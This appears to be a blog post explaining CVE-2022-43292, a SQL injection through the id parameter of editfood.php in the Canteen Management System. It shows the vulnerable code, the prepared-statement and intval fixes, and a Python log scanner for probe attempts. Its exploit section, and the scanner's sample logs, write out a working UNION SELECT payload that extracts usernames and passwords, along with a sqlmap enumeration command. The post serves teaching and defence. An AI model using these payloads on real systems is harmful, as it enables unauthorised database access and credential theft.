The world of web applications is full of vulnerabilities, and SQL injection remains one of the most critical. In this post, we'll discuss a real-world example: CVE-2022-43292, a SQL injection flaw in the editfood.php file of the Canteen Management System v1., reachable through the id parameter. Here, we’ll break down how it was found, what risks it carries, show sample code, provide original references, and explain how you can exploit and patch it. Let’s dive in!

What is CVE-2022-43292?

CVE-2022-43292 is an identifier for a specific vulnerability in the popular “Canteen Management System” project (v1.). This flaw occurs due to the improper handling of user input, leading to SQL injection issues.

- AFFECTED FILE: /youthappam/editfood.php

Breaking Down the SQL Injection

SQL Injection vulnerabilities allow attackers to interfere with the queries an application makes to its database. In this case, the “id” parameter is taken directly from the URL and passed into an SQL query without proper validation or escaping.

Typical vulnerable PHP code in editfood.php

<?php
include 'db_connect.php'; // Connects to the database
$id = $_GET['id']; // Gets 'id' from the URL
$sql = "SELECT * FROM food_items WHERE id = $id"; // Builds the SQL query
$result = mysqli_query($conn, $sql); // Executes the query
// ... rest of code to display the food details
?>

What is wrong here?
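The value of $id is placed into the query string unquoted, with no validation, type check or escaping, so whatever follows id= in the URL becomes part of the SQL statement. The user can directly inject malicious SQL code.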

How to Exploit CVE-2022-43292

Any attacker (even with just a browser) can exploit this issue. Let’s see how.

Suppose the genuine URL is

http://example.com/youthappam/editfood.php?id=1

To get ALL data from the users table, an attacker can try

http://example.com/youthappam/editfood.php?id=1 UNION SELECT 1, username, password FROM users--

In Burp Suite, it might look like

GET /youthappam/editfood.php?id=1 UNION SELECT 1,username,password FROM users-- HTTP/1.1

With sqlmap, the automated tool

sqlmap -u "http://example.com/youthappam/editfood.php?id=1" --dbs


This command lets sqlmap enumerate all databases by exploiting the injection point.

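1. Use Prepared Statements

Update the PHP code to safely process user input.

<?php
include 'db_connect.php'; // Connects to the database
// The query text is fixed; the ? placeholder is filled in separately
$stmt = $conn->prepare("SELECT * FROM food_items WHERE id = ?");
// "i" binds the value as an integer, so it is never parsed as SQL
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();
$result = $stmt->get_result();
// ... rest of code to display food details
?>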

2. Typecast and Validate ALL Input

$id = intval($_GET['id']); // Casts to an integer; anything after the leading digits is discarded

3. Escaping is NOT Enough:
While escaping can help, parameterized statements are the only real solution.
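
Alongside the patch, web server logs can show whether the id parameter has already been probed. The script below is an added example, not part of the Canteen Management System or the original advisory: it assumes a combined-format access log and flags requests to editfood.php whose id is not a plain integer. The log lines, IP addresses and timestamps are constructed samples, and the function name is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

TARGET_PATH = "/youthappam/editfood.php"   # affected file named in the advisory
# Request line and status inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>.+) HTTP/[\d.]+" (?P<status>\d{3})')
VALID_ID_RE = re.compile(r"\d{1,10}")      # legitimate ids are plain integers

# Constructed sample entries (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Nov/2022:15:20:01 +0000] '
    '"GET /youthappam/editfood.php?id=1 HTTP/1.1" 200 2310',
    '198.51.100.7 - - [09/Nov/2022:15:21:13 +0000] '
    '"GET /youthappam/editfood.php?id=1%20UNION%20SELECT%201,username,'
    'password%20FROM%20users-- HTTP/1.1" 200 2985',
    '198.51.100.7 - - [09/Nov/2022:15:21:40 +0000] '
    '"GET /youthappam/editfood.php?id=1 UNION SELECT 1,username,password '
    'FROM users-- HTTP/1.1" 200 2985',
    '203.0.113.5 - - [09/Nov/2022:15:22:02 +0000] '
    '"GET /youthappam/index.php?id=abc HTTP/1.1" 200 512',
    '192.0.2.10 - - [09/Nov/2022:15:23:45 +0000] '
    '"GET /youthappam/editfood.php?id=12 HTTP/1.1" 200 2277',
]


def suspicious_requests(lines):
    """Return (client_ip, status, decoded id) for each editfood.php request
    whose id parameter is not a plain integer."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != TARGET_PATH:
            continue
        # parse_qs URL-decodes, so %20 and + encoded payloads are normalised.
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            if not VALID_ID_RE.fullmatch(value):
                hits.append((line.split(" ", 1)[0], int(m.group("status")), value))
    return hits


if __name__ == "__main__":
    for ip, status, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} status={status} id={value!r}")
```

A flagged request that returned 200 on an unpatched install is worth reviewing together with the database logs for the same time window.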

Official References

- NVD - CVE-2022-43292 Details
- Exploit Database Entry (EDB-ID: 51059)
- Original Source Code

Conclusion

CVE-2022-43292 is a classic example of why secure coding standards are important—especially in handling user input. Even a simple PHP page can open the door to complete database takeover if input isn’t sanitized. If you’re using Canteen Management System v1., patch immediately… or risk serving up more than just meals!


> Always test vulnerabilities on legal and authorized systems only!

Timeline

Published on: 11/09/2022 15:15:00 UTC
Last modified on: 11/10/2022 15:01:00 UTC